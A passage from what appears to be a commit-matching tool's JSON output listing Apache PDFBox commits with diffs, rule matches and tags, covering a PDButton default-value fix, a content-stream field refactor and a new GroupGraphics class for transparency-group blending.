"diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", + "index 1a9fbb675..adcc1bb9b 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", + "@@ -124,4 +124,6 @@ public abstract class PDButton extends PDTerminalField", + " /**", + "- * Returns the selected value. May be empty if NoToggleToOff is set but there is no value", + "- * selected.", + "+ * Returns the selected value.", + "+ * ", + "+ *

    Off is the default value which will also be returned if the", + "+ * value hasn't been set at all.", + " * ", + "@@ -138,3 +140,5 @@ public abstract class PDButton extends PDTerminalField", + " {", + "- return \"\";", + "+ // Off is the default value if there is nothing else set.", + "+ // See PDF Spec.", + "+ return \"Off\";", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4256": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "d9b25c8f54f2194d52d2d15bfac342136df38d01" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "RELEVANT_WORDS_IN_MESSAGE", + "message": "The commit message contains some relevant words: PDF", + "relevance": 8 + }, + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4256", + "relevance": 2 + } + ] + }, + { + "commit_id": "28729eb34537a04e522c604906925e9a8024b34f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525925984, + "hunks": 15, + "message": "PDFBOX-4068: bug fix - remove duplicated fields from PDPageContentStream git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831301 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "index b66e1e0ba..0d3eb8ca2 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "@@ -60,7 +60,7 @@ abstract class PDAbstractContentStream implements Closeable", + "- private boolean inTextMode = false;", + "- private final Stack fontStack = new Stack<>();", + "+ protected boolean inTextMode = false;", + "+ protected final Stack fontStack = new Stack<>();", + "- private final Stack nonStrokingColorSpaceStack = new Stack<>();", + "- private final Stack strokingColorSpaceStack = new Stack<>();", + "+ protected final Stack nonStrokingColorSpaceStack = new Stack<>();", + "+ protected final Stack strokingColorSpaceStack = new Stack<>();", + "@@ -104,3 +104,3 @@ abstract class PDAbstractContentStream implements Closeable", + " }", + "- ", + "+", + " public OutputStream getOutputStream()", + "@@ -114,3 +114,3 @@ abstract class PDAbstractContentStream implements Closeable", + " }", + "- ", + "+", + " public PDResources getResources()", + "@@ -124,18 +124,2 @@ abstract class PDAbstractContentStream implements Closeable", + " }", + "- ", + "- public Stack getStrokingColorSpaceStack()", + "- {", + "- return strokingColorSpaceStack;", + "- }", + "-", + "- public Stack getNonStrokingColorSpaceStack()", + "- {", + "- return nonStrokingColorSpaceStack;", + "- }", + "-", + "- ", + "- public boolean isInTextMode()", + "- {", + "- return inTextMode;", + "- }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "index 6d4cc2bb4..d9032a819 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", + "@@ -30,3 +30,2 @@ import java.util.Map;", + " import java.util.Set;", + "-import java.util.Stack;", + " import java.util.regex.Pattern;", + "@@ -102,7 +101,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + "- private final Stack fontStack = new Stack<>();", + "-", + "- private final Stack nonStrokingColorSpaceStack = new Stack<>();", + "- private final Stack strokingColorSpaceStack = new Stack<>();", + "-", + " private final Map gsubWorkers = new HashMap<>();", + "@@ -330,3 +324,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (!isInTextMode())", + "+ if (!inTextMode)", + " {", + "@@ -537,3 +531,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (isInTextMode())", + "+ if (inTextMode)", + " {", + "@@ -790,3 +784,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (isInTextMode())", + "+ if (inTextMode)", + " {", + "@@ -865,3 +859,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (isInTextMode())", + "+ if (inTextMode)", + " {", + "@@ -888,3 +882,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (isInTextMode())", + "+ if (inTextMode)", + " {", + "@@ -909,3 +903,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (isInTextMode())", + "+ if (inTextMode)", + " {", + "@@ -942,3 +936,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (isInTextMode())", + "+ if (inTextMode)", + " {", + "@@ -961,3 +955,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (isInTextMode())", + "+ if (inTextMode)", + " {", + "@@ -1016,3 +1010,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", + " {", + "- if (isInTextMode())", + "+ if (inTextMode)", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4068": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: page", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4068", + "relevance": 2 + } + ] + }, + { + "commit_id": "3e526fabd47194f9faa0042dfab92ac6cc3b41cb", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530377414, + "hunks": 19, + "message": "PDFBOX-3000: support rendering of blend modes in non-isolated transparency groups, by Jani Pehkonen git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834751 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", + "new file mode 100644", + "index 000000000..b21ca1e6f", + "--- /dev/null", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", + "@@ -0,0 +1,728 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.rendering;", + "+", + "+import java.awt.Color;", + "+import java.awt.Composite;", + "+import java.awt.Font;", + "+import java.awt.FontMetrics;", + "+import java.awt.Graphics;", + "+import java.awt.Graphics2D;", + "+import java.awt.GraphicsConfiguration;", + "+import java.awt.Image;", + "+import java.awt.Paint;", + "+import java.awt.Rectangle;", + "+import java.awt.RenderingHints;", + "+import java.awt.Shape;", + "+import java.awt.Stroke;", + "+import java.awt.font.FontRenderContext;", + "+import java.awt.font.GlyphVector;", + "+import java.awt.geom.AffineTransform;", + "+import java.awt.image.BufferedImage;", + "+import java.awt.image.BufferedImageOp;", + "+import java.awt.image.DataBuffer;", + "+import java.awt.image.DataBufferInt;", + "+import java.awt.image.ImageObserver;", + "+import java.awt.image.RenderedImage;", + "+import java.awt.image.renderable.RenderableImage;", + "+import java.text.AttributedCharacterIterator;", + "+import java.util.Map;", + "+", + "+/**", + "+ * Graphics implementation for non-isolated transparency groups.", + "+ *

    ", + "+ * Non-isolated groups require that the group backdrop (copied from parent group or", + "+ * page) is used as the initial contents of the image to which the group is rendered.", + "+ * This allows blend modes to blend the group contents with the graphics behind", + "+ * the group. Finally when the group rendering is done, backdrop removal must be", + "+ * computed (see {@link #removeBackdrop(java.awt.image.BufferedImage, int, int) removeBackdrop}).", + "+ * It ensures the backdrop is not rendered twice on the parent but it leaves the", + "+ * effects of blend modes.", + "+ *

    ", + "+ * This class renders the group contents to two images. groupImage is", + "+ * initialized with the backdrop and group contents are drawn over it.", + "+ * groupAlphaImage is initially fully transparent and it accumulates", + "+ * the total alpha of the group contents excluding backdrop.", + "+ *

    ", + "+ * If a non-isolated group uses only the blend mode Normal, it can be optimized", + "+ * and rendered like an isolated group; backdrop usage and removal are not needed.", + "+ */", + "+", + "+class GroupGraphics extends Graphics2D", + "+{", + "+ private final BufferedImage groupImage;", + "+ private final BufferedImage groupAlphaImage;", + "+ private final Graphics2D groupGraphics;", + "+ private final Graphics2D alphaGraphics;", + "+", + "+ GroupGraphics(BufferedImage groupImage, Graphics2D groupGraphics)", + "+ {", + "+ this.groupImage = groupImage;", + "+ this.groupGraphics = groupGraphics;", + "+ this.groupAlphaImage = new BufferedImage(groupImage.getWidth(), groupImage.getHeight(),", + "+ BufferedImage.TYPE_INT_ARGB);", + "+ this.alphaGraphics = groupAlphaImage.createGraphics();", + "+ }", + "+", + "+ private GroupGraphics(BufferedImage groupImage, Graphics2D groupGraphics,", + "+ BufferedImage groupAlphaImage, Graphics2D alphaGraphics)", + "+ {", + "+ this.groupImage = groupImage;", + "+ this.groupGraphics = groupGraphics;", + "+ this.groupAlphaImage = groupAlphaImage;", + "+ this.alphaGraphics = alphaGraphics;", + "+ }", + "+", + "+ @Override", + "+ public void clearRect(int x, int y, int width, int height)", + "+ {", + "+ groupGraphics.clearRect(x, y, width, height);", + "+ alphaGraphics.clearRect(x, y, width, height);", + "+ }", + "+", + "+ @Override", + "+ public void clipRect(int x, int y, int width, int height)", + "+ {", + "+ groupGraphics.clipRect(x, y, width, height);", + "+ alphaGraphics.clipRect(x, y, width, height);", + "+ }", + "+", + "+ @Override", + "+ public void copyArea(int x, int y, int width, int height, int dx, int dy)", + "+ {", + "+ groupGraphics.copyArea(x, y, width, height, dx, dy);", + "+ alphaGraphics.copyArea(x, y, width, height, dx, dy);", + "+ }", + "+", + "+ @Override", + "+ public Graphics create()", + "+ {", + "+ Graphics g = groupGraphics.create();", + "+ Graphics a = alphaGraphics.create();", + "+ if (g instanceof Graphics2D && a instanceof Graphics2D)", + "+ {", + "+ return new GroupGraphics(groupImage, (Graphics2D)g, groupAlphaImage, (Graphics2D)a);", + "+ }", + "+ throw new UnsupportedOperationException();", + "+ }", + "+", + "+ @Override", + "+ public void dispose()", + "+ {", + "+ groupGraphics.dispose();", + "+ alphaGraphics.dispose();", + "+ }", + "+", + "+ @Override", + "+ public void drawArc(int x, int y, int width, int height, int startAngle, int arcAngle)", + "+ {", + "+ groupGraphics.drawArc(x, y, width, height, startAngle, arcAngle);", + "+ alphaGraphics.drawArc(x, y, width, height, startAngle, arcAngle);", + "+ }", + "+", + "+ @Override", + "+ public boolean drawImage(Image img, int x, int y, Color bgcolor, ImageObserver observer)", + "+ {", + "+ groupGraphics.drawImage(img, x, y, bgcolor, observer);", + "+ return alphaGraphics.drawImage(img, x, y, bgcolor, observer);", + "+ }", + "+", + "+ @Override", + "+ public boolean drawImage(Image img, int x, int y, ImageObserver observer)", + "+ {", + "+ groupGraphics.drawImage(img, x, y, observer);", + "+ return alphaGraphics.drawImage(img, x, y, observer);", + "+ }", + "+", + "+ @Override", + "+ public boolean drawImage(Image img, int x, int y, int width, int height,", + "+ Color bgcolor, ImageObserver observer)", + "+ {", + "+ groupGraphics.drawImage(img, x, y, width, height, bgcolor, observer);", + "+ return alphaGraphics.drawImage(img, x, y, width, height, bgcolor, observer);", + "+ }", + "+", + "+ @Override", + "+ public boolean drawImage(Image img, int x, int y, int width, int height, ImageObserver observer)", + "+ {", + "+ groupGraphics.drawImage(img, x, y, width, height, observer);", + "+ return alphaGraphics.drawImage(img, x, y, width, height, observer);", + "+ }", + "+", + "+ @Override", + "+ public boolean drawImage(Image img, int dx1, int dy1, int dx2, int dy2, int sx1,", + "+ int sy1, int sx2, int sy2, Color bgcolor, ImageObserver observer)", + "+ {", + "+ groupGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", + "+ return alphaGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", + "+ }", + "+", + "+ @Override", + "+ public boolean drawImage(Image img, int dx1, int dy1, int dx2, int dy2, int sx1,", + "+ int sy1, int sx2, int sy2, ImageObserver observer)", + "+ {", + "+ groupGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", + "+ return alphaGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", + "+ }", + "+", + "+ @Override", + "+ public void drawLine(int x1, int y1, int x2, int y2)", + "+ {", + "+ groupGraphics.drawLine(x1, y1, x2, y2);", + "+ alphaGraphics.drawLine(x1, y1, x2, y2);", + "+ }", + "+", + "+ @Override", + "+ public void drawOval(int x, int y, int width, int height)", + "+ {", + "+ groupGraphics.drawOval(x, y, width, height);", + "+ alphaGraphics.drawOval(x, y, width, height);", + "+ }", + "+", + "+ @Override", + "+ public void drawPolygon(int[] xPoints, int[] yPoints, int nPoints)", + "+ {", + "+ groupGraphics.drawPolygon(xPoints, yPoints, nPoints);", + "+ alphaGraphics.drawPolygon(xPoints, yPoints, nPoints);", + "+ }", + "+", + "+ @Override", + "+ public void drawPolyline(int[] xPoints, int[] yPoints, int nPoints)", + "+ {", + "+ groupGraphics.drawPolyline(xPoints, yPoints, nPoints);", + "+ alphaGraphics.drawPolyline(xPoints, yPoints, nPoints);", + "+ }", + "+", + "+ @Override", + "+ public void drawRoundRect(int x, int y, int width, int height, int arcWidth, int arcHeight)", + "+ {", + "+ groupGraphics.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", + "+ alphaGraphics.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", + "+ }", + "+", + "+ @Override", + "+ public void drawString(AttributedCharacterIterator iterator, int x, int y)", + "+ {", + "+ groupGraphics.drawString(iterator, x, y);", + "+ alphaGraphics.drawString(iterator, x, y);", + "+ }", + "+", + "+ @Override", + "+ public void drawString(String str, int x, int y)", + "+ {", + "+ groupGraphics.drawString(str, x, y);", + "+ alphaGraphics.drawString(str, x, y);", + "+ }", + "+", + "+ @Override", + "+ public void fillArc(int x, int y, int width, int height, int startAngle, int arcAngle)", + "+ {", + "+ groupGraphics.fillArc(x, y, width, height, startAngle, arcAngle);", + "+ alphaGraphics.fillArc(x, y, width, height, startAngle, arcAngle);", + "+ }", + "+", + "+ @Override", + "+ public void fillOval(int x, int y, int width, int height)", + "+ {", + "+ groupGraphics.fillOval(x, y, width, height);", + "+ alphaGraphics.fillOval(x, y, width, height);", + "+ }", + "+", + "+ @Override", + "+ public void fillPolygon(int[] xPoints, int[] yPoints, int nPoints)", + "+ {", + "+ groupGraphics.fillPolygon(xPoints, yPoints, nPoints);", + "+ alphaGraphics.fillPolygon(xPoints, yPoints, nPoints);", + "+ }", + "+", + "+ @Override", + "+ public void fillRect(int x, int y, int width, int height)", + "+ {", + "+ groupGraphics.fillRect(x, y, width, height);", + "+ alphaGraphics.fillRect(x, y, width, height);", + "+ }", + "+", + "+ @Override", + "+ public void fillRoundRect(int x, int y, int width, int height, int arcWidth, int arcHeight)", + "+ {", + "+ groupGraphics.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", + "+ alphaGraphics.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", + "+ }", + "+", + "+ @Override", + "+ public Shape getClip()", + "+ {", + "+ return groupGraphics.getClip();", + "+ }", + "+", + "+ @Override", + "+ public Rectangle getClipBounds()", + "+ {", + "+ return groupGraphics.getClipBounds();", + "+ }", + "+", + "+ @Override", + "+ public Color getColor()", + "+ {", + "+ return groupGraphics.getColor();", + "+ }", + "+", + "+ @Override", + "+ public Font getFont()", + "+ {", + "+ return groupGraphics.getFont();", + "+ }", + "+", + "+ @Override", + "+ public FontMetrics getFontMetrics(Font f)", + "+ {", + "+ return groupGraphics.getFontMetrics(f);", + "+ }", + "+", + "+ @Override", + "+ public void setClip(int x, int y, int width, int height)", + "+ {", + "+ groupGraphics.setClip(x, y, width, height);", + "+ alphaGraphics.setClip(x, y, width, height);", + "+ }", + "+", + "+ @Override", + "+ public void setClip(Shape clip)", + "+ {", + "+ groupGraphics.setClip(clip);", + "+ alphaGraphics.setClip(clip);", + "+ }", + "+", + "+ @Override", + "+ public void setColor(Color c)", + "+ {", + "+ groupGraphics.setColor(c);", + "+ alphaGraphics.setColor(c);", + "+ }", + "+", + "+ @Override", + "+ public void setFont(Font font)", + "+ {", + "+ groupGraphics.setFont(font);", + "+ alphaGraphics.setFont(font);", + "+ }", + "+", + "+ @Override", + "+ public void setPaintMode()", + "+ {", + "+ groupGraphics.setPaintMode();", + "+ alphaGraphics.setPaintMode();", + "+ }", + "+", + "+ @Override", + "+ public void setXORMode(Color c1)", + "+ {", + "+ groupGraphics.setXORMode(c1);", + "+ alphaGraphics.setXORMode(c1);", + "+ }", + "+", + "+ @Override", + "+ public void translate(int x, int y)", + "+ {", + "+ groupGraphics.translate(x, y);", + "+ alphaGraphics.translate(x, y);", + "+ }", + "+", + "+ @Override", + "+ public void addRenderingHints(Map hints)", + "+ {", + "+ groupGraphics.addRenderingHints(hints);", + "+ alphaGraphics.addRenderingHints(hints);", + "+ }", + "+", + "+ @Override", + "+ public void clip(Shape s)", + "+ {", + "+ groupGraphics.clip(s);", + "+ alphaGraphics.clip(s);", + "+ }", + "+", + "+ @Override", + "+ public void draw(Shape s)", + "+ {", + "+ groupGraphics.draw(s);", + "+ alphaGraphics.draw(s);", + "+ }", + "+", + "+ @Override", + "+ public void drawGlyphVector(GlyphVector g, float x, float y)", + "+ {", + "+ groupGraphics.drawGlyphVector(g, x, y);", + "+ alphaGraphics.drawGlyphVector(g, x, y);", + "+ }", + "+", + "+ @Override", + "+ public void drawImage(BufferedImage img, BufferedImageOp op, int x, int y)", + "+ {", + "+ groupGraphics.drawImage(img, op, x, y);", + "+ alphaGraphics.drawImage(img, op, x, y);", + "+ }", + "+", + "+ @Override", + "+ public boolean drawImage(Image img, AffineTransform xform, ImageObserver obs)", + "+ {", + "+ groupGraphics.drawImage(img, xform, obs);", + "+ return alphaGraphics.drawImage(img, xform, obs);", + "+ }", + "+", + "+ @Override", + "+ public void drawRenderableImage(RenderableImage img, AffineTransform xform)", + "+ {", + "+ groupGraphics.drawRenderableImage(img, xform);", + "+ alphaGraphics.drawRenderableImage(img, xform);", + "+ }", + "+", + "+ @Override", + "+ public void drawRenderedImage(RenderedImage img, AffineTransform xform)", + "+ {", + "+ groupGraphics.drawRenderedImage(img, xform);", + "+ alphaGraphics.drawRenderedImage(img, xform);", + "+ }", + "+", + "+ @Override", + "+ public void drawString(AttributedCharacterIterator iterator, float x, float y)", + "+ {", + "+ groupGraphics.drawString(iterator, x, y);", + "+ alphaGraphics.drawString(iterator, x, y);", + "+ }", + "+", + "+ @Override", + "+ public void drawString(String str, float x, float y)", + "+ {", + "+ groupGraphics.drawString(str, x, y);", + "+ alphaGraphics.drawString(str, x, y);", + "+ }", + "+", + "+ @Override", + "+ public void fill(Shape s)", + "+ {", + "+ groupGraphics.fill(s);", + "+ alphaGraphics.fill(s);", + "+ }", + "+", + "+ @Override", + "+ public Color getBackground()", + "+ {", + "+ return groupGraphics.getBackground();", + "+ }", + "+", + "+ @Override", + "+ public Composite getComposite()", + "+ {", + "+ return groupGraphics.getComposite();", + "+ }", + "+", + "+ @Override", + "+ public GraphicsConfiguration getDeviceConfiguration()", + "+ {", + "+ return groupGraphics.getDeviceConfiguration();", + "+ }", + "+", + "+ @Override", + "+ public FontRenderContext getFontRenderContext()", + "+ {", + "+ return groupGraphics.getFontRenderContext();", + "+ }", + "+", + "+ @Override", + "+ public Paint getPaint()", + "+ {", + "+ return groupGraphics.getPaint();", + "+ }", + "+", + "+ @Override", + "+ public Object getRenderingHint(RenderingHints.Key hintKey)", + "+ {", + "+ return groupGraphics.getRenderingHint(hintKey);", + "+ }", + "+", + "+ @Override", + "+ public RenderingHints getRenderingHints()", + "+ {", + "+ return groupGraphics.getRenderingHints();", + "+ }", + "+", + "+ @Override", + "+ public Stroke getStroke()", + "+ {", + "+ return groupGraphics.getStroke();", + "+ }", + "+", + "+ @Override", + "+ public AffineTransform getTransform()", + "+ {", + "+ return groupGraphics.getTransform();", + "+ }", + "+", + "+ @Override", + "+ public boolean hit(Rectangle rect, Shape s, boolean onStroke)", + "+ {", + "+ return groupGraphics.hit(rect, s, onStroke);", + "+ }", + "+", + "+ @Override", + "+ public void rotate(double theta)", + "+ {", + "+ groupGraphics.rotate(theta);", + "+ alphaGraphics.rotate(theta);", + "+ }", + "+", + "+ @Override", + "+ public void rotate(double theta, double x, double y)", + "+ {", + "+ groupGraphics.rotate(theta, x, y);", + "+ alphaGraphics.rotate(theta, x, y);", + "+ }", + "+", + "+ @Override", + "+ public void scale(double sx, double sy)", + "+ {", + "+ groupGraphics.scale(sx, sy);", + "+ alphaGraphics.scale(sx, sy);", + "+ }", + "+", + "+ @Override", + "+ public void setBackground(Color color)", + "+ {", + "+ groupGraphics.setBackground(color);", + "+ alphaGraphics.setBackground(color);", + "+ }", + "+", + "+ @Override", + "+ public void setComposite(Composite comp)", + "+ {", + "+ groupGraphics.setComposite(comp);", + "+ alphaGraphics.setComposite(comp);", + "+ }", + "+", + "+ @Override", + "+ public void setPaint(Paint paint)", + "+ {", + "+ groupGraphics.setPaint(paint);", + "+ alphaGraphics.setPaint(paint);", + "+ }", + "+", + "+ @Override", + "+ public void setRenderingHint(RenderingHints.Key hintKey, Object hintValue)", + "+ {", + "+ groupGraphics.setRenderingHint(hintKey, hintValue);", + "+ alphaGraphics.setRenderingHint(hintKey, hintValue);", + "+ }", + "+", + "+ @Override", + "+ public void setRenderingHints(Map hints)", + "+ {", + "+ groupGraphics.setRenderingHints(hints);", + "+ alphaGraphics.setRenderingHints(hints);", + "+ }", + "+", + "+ @Override", + "+ public void setStroke(Stroke s)", + "+ {", + "+ groupGraphics.setStroke(s);", + "+ alphaGraphics.setStroke(s);", + "+ }", + "+", + "+ @Override", + "+ public void setTransform(AffineTransform tx)", + "+ {", + "+ groupGraphics.setTransform(tx);", + "+ alphaGraphics.setTransform(tx);", + "+ }", + "+", + "+ @Override", + "+ public void shear(double shx, double shy)", + "+ {", + "+ groupGraphics.shear(shx, shy);", + "+ alphaGraphics.shear(shx, shy);", + "+ }", + "+", + "+ @Override", + "+ public void transform(AffineTransform tx)", + "+ {", + "+ groupGraphics.transform(tx);", + "+ alphaGraphics.transform(tx);", + "+ }", + "+", + "+ @Override", + "+ public void translate(double tx, double ty)", + "+ {", + "+ groupGraphics.translate(tx, ty);", + "+ alphaGraphics.translate(tx, ty);", + "+ }", + "+", + "+ /**", + "+ * Computes backdrop removal.", + "+ * The backdrop removal equation is given in section 11.4.4 in the PDF 32000-1:2008", + "+ * standard. It returns the final color C for each pixel in the group:
    ", + "+ * C = Cn + (Cn - C0) * (alpha0 / alphagn - alpha0)
    ", + "+ * where
    ", + "+ * Cn is the group color including backdrop (read from groupImage),
    ", + "+ * C0 is the backdrop color,
    ", + "+ * alpha0 is the backdrop alpha,
    ", + "+ * alphagn is the group alpha excluding backdrop (read the", + "+ * alpha channel from groupAlphaImage)
    ", + "+ *

    ", + "+ * The alpha of the result is equal to alphagn, i.e., the alpha", + "+ * channel of groupAlphaImage.", + "+ *

    ", + "+ * The backdrop image may be much larger than groupImage if,", + "+ * for example, the current page is used as the backdrop. Only a specific rectangular", + "+ * region of backdrop is used in the backdrop removal: upper-left corner", + "+ * is at (offsetX, offsetY); width and height are equal to those of", + "+ * groupImage.", + "+ *", + "+ * @param backdrop group backdrop", + "+ * @param offsetX backdrop left X coordinate", + "+ * @param offsetY backdrop upper Y coordinate", + "+ */", + "+ void removeBackdrop(BufferedImage backdrop, int offsetX, int offsetY)", + "+ {", + "+ int groupWidth = groupImage.getWidth();", + "+ int groupHeight = groupImage.getHeight();", + "+ int backdropWidth = backdrop.getWidth();", + "+ int backdropHeight = backdrop.getHeight();", + "+ int groupType = groupImage.getType();", + "+ int groupAlphaType = groupAlphaImage.getType();", + "+ int backdropType = backdrop.getType();", + "+ DataBuffer groupDataBuffer = groupImage.getRaster().getDataBuffer();", + "+ DataBuffer groupAlphaDataBuffer = groupAlphaImage.getRaster().getDataBuffer();", + "+ DataBuffer backdropDataBuffer = backdrop.getRaster().getDataBuffer();", + "+", + "+ if (groupType == BufferedImage.TYPE_INT_ARGB &&", + "+ groupAlphaType == BufferedImage.TYPE_INT_ARGB &&", + "+ (backdropType == BufferedImage.TYPE_INT_ARGB || backdropType == BufferedImage.TYPE_INT_RGB) &&", + "+ groupDataBuffer instanceof DataBufferInt &&", + "+ groupAlphaDataBuffer instanceof DataBufferInt &&", + "+ backdropDataBuffer instanceof DataBufferInt)", + "+ {", + "+ // Optimized computation for int[] buffers.", + "+", + "+ int[] groupData = ((DataBufferInt)groupDataBuffer).getData();", + "+ int[] groupAlphaData = ((DataBufferInt)groupAlphaDataBuffer).getData();", + "+ int[] backdropData = ((DataBufferInt)backdropDataBuffer).getData();", + "+ boolean backdropHasAlpha = backdropType == BufferedImage.TYPE_INT_ARGB;", + "+", + "+ for (int y = 0; y < groupHeight; y++)", + "+ {", + "+ for (int x = 0; x < groupWidth; x++)", + "+ {", + "+ int index = x + y * groupWidth;", + "+", + "+ // alphagn is the total alpha of the group contents excluding backdrop.", + "+ int alphagn = (groupAlphaData[index] >> 24) & 0xFF;", + "+ if (alphagn == 0)", + "+ {", + "+ // Avoid division by 0 and set the result to fully transparent.", + "+ groupData[index] = 0;", + "+ continue;", + "+ }", + "+", + "+ int backdropX = x + offsetX;", + "+ int backdropY = y + offsetY;", + "+ int backdropRGB; // color of backdrop pixel", + "+ float alpha0; // alpha of backdrop pixel", + "+", + "+ if (backdropX >= 0 && backdropX < backdropWidth &&", + "+ backdropY >= 0 && backdropY < backdropHeight)", + "+ {", + "+ backdropRGB = backdropData[backdropX + backdropY * backdropWidth];", + "+ alpha0 = backdropHasAlpha ? ((backdropRGB >> 24) & 0xFF) : 255;", + "+ }", + "+ else", + "+ {", + "+ // Backdrop pixel is out of bounds. Use a transparent value.", + "+ backdropRGB = 0;", + "+ alpha0 = 0;", + "+ }", + "+", + "+ // Alpha factor alpha0 / alphagn - alpha0 is in range 0.0-1.0.", + "+ float alphaFactor = alpha0 / (float)alphagn - alpha0 / 255.0f;", + "+ int groupRGB = groupData[index]; // color of group pixel", + "+", + "+ // Compute backdrop removal for RGB components.", + "+ int r = backdropRemoval(groupRGB, backdropRGB, 16, alphaFactor);", + "+ int g = backdropRemoval(groupRGB, backdropRGB, 8, alphaFactor);", + "+ int b = backdropRemoval(groupRGB, backdropRGB, 0, alphaFactor);", + "+", + "+ // Copy the result back to groupImage. The alpha of the result", + "+ // is equal to alphagn.", + "+ groupData[index] = (alphagn << 24) | (r << 16) | (g << 8) | b;", + "+ }", + "+ }", + "+ }", + "+ else", + "+ {", + "+ // Non-optimized computation for other types of color spaces and pixel buffers.", + "+", + "+ for (int y = 0; y < groupHeight; y++)", + "+ {", + "+ for (int x = 0; x < groupWidth; x++)", + "+ {", + "+ int alphagn = (groupAlphaImage.getRGB(x, y) >> 24) & 0xFF;", + "+ if (alphagn == 0)", + "+ {", + "+ groupImage.setRGB(x, y, 0);", + "+ continue;", + "+ }", + "+", + "+ int backdropX = x + offsetX;", + "+ int backdropY = y + offsetY;", + "+ int backdropRGB;", + "+ float alpha0;", + "+ if (backdropX >= 0 && backdropX < backdropWidth &&", + "+ backdropY >= 0 && backdropY < 